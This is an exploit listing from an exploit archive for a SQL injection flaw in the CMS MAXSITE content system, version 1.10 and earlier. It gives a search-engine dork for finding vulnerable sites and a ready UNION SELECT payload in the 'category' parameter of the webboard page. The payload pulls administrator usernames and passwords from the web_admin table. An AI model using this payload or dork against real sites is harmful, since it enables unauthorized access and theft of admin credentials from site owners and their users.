CMS MAXSITE <= 1.10 (category) Remote SQL Injection Vulnerability

2008-05-26T00:00:00
ID 1337DAY-ID-3071
Type zdt
Reporter Tesz
Modified 2008-05-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================================
CMS MAXSITE <= 1.10 (category) Remote SQL Injection Vulnerability
=================================================================



[+] Author: Tesz 
[+] Home: http://www.thaishadow.com
[+] Forum: http://www.thaishadow.com/board/index.php

[+] Download: http://maxsite.geniuscyber.com/index.php?name=index

[+] Dork: MAXSITE or intitle:"MAXSITE"

[+] Exploit: http://server.com/path/index.php?name=webboard&category=1+and+1=2+union+select+concat(username,0x3A,password)+from+web_admin/*

[+] index.php?name=webboard&category=1+and+1=2+union+select+concat(username,0x3A,password)+from+web_admin/*




#  0day.today [2018-03-13]  #